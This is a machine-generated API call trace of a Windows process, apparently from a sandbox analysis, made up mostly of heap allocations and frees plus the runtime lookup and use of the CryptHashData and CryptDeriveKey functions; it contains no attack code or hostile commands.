RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0265.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0265.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0265.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0265.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0265.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d18 [0265.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0265.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0265.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55108, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0265.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f68 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0265.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0265.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0265.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.756] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0265.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0265.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0265.756] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0265.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0265.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0265.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0265.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0265.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0265.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0265.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0265.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.757] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0265.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51bc8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0265.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.758] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0265.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0265.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.758] CryptHashData (hHash=0xa86f50, pbData=0x2e550a8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0265.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.758] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0265.759] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.759] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0265.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e80 [0265.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0265.759] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0265.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0265.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0265.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0265.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0265.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0265.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0265.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0265.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0265.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0265.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0265.760] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0265.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0265.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ce8 [0265.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0265.760] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0265.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0265.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0265.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0265.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0265.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0265.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0265.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0265.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0265.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0265.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0265.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0265.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0265.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0265.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0265.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0265.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0265.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.763] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0265.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0265.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0265.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0265.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0265.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0265.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0265.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0265.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51ca0 [0265.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51ca0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0265.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.767] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0265.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0265.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0265.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0265.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0265.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 